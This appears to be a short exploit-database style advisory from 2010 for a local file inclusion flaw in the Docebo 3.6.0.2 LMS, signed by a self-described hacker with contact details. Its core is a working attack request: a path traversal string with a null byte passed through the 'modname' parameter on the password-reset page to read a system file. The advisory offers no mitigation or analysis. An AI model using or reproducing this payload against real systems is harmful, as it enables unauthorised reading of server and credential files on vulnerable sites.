# Exploit Title: Docebo 3.6.0.2 (stable) Local File Inclusion # Date: 2010-01-06# Author: Zer0 Thunder# Site : http://www.docebolms.org/# Software Link: http://www.docebolms.org/doceboCms/# Version: 3.6.0.2# Tested on: Windows XP sp2 [WampServer 2.0i] # CVE : # Code :
Exploit :
http://localhost/docebo/index.php?modname=[LFI]&op=lostpwd
Sample :( Only Tested On Wamp 2.0i)
http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lostpwd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~######################################### MSN : zer0_thunder@colombohackers.com# Email : neonwarlock@live.com# Site : LKHackers.com# Greetz : To all my friends# Note : Proud to be a Sri Lankan# Me : Sri Lankan Hacker########################################
